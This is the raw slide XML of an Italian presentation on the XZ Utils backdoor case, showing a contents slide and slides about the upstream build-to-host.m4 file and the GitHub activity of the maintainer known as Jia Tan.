              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>build-to-host.m4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, presente solo in upstream.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sull'upstream presso GitHub, l'autore dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che contengono questi artefatti è l'utente JiaT75, uno dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, conosciuto con lo pseudonimo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9114284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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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166" y="3300"/>
            <a:ext cx="10524739" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14472957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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3E76CD-347A-6F4E-40AA-68688F82E9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4793" y="2606442"/>
            <a:ext cx="7129607" cy="422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4843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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CDAF3D-9B14-306B-4CAE-48422DAD35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071" y="3135613"/>
            <a:ext cx="6096000" cy="2691346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7B9107-160C-213B-0330-5C33CB8587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9309" y="2414814"/>
            <a:ext cx="5508991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0772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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37705CAA-B40F-8092-4487-F47B582A4B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1999" y="2596996"/>
            <a:ext cx="4988002" cy="4096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5843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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="390876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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chi è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan è uno sviluppatore open-source iscritto a GitHub dal 26 Gennaio 2021. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ha partecipato a diversi progetti. I più rilevanti per questo caso sono:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: progetto Google per supportare lo sviluppo sicuro di software libero attraverso il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> testing;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Altre partecipazioni comprendono:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpp-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: documentazione tecnica per linguaggio C++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wasmtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> standalone per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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388942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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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5789" y="-79"/>
            <a:ext cx="10514006" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
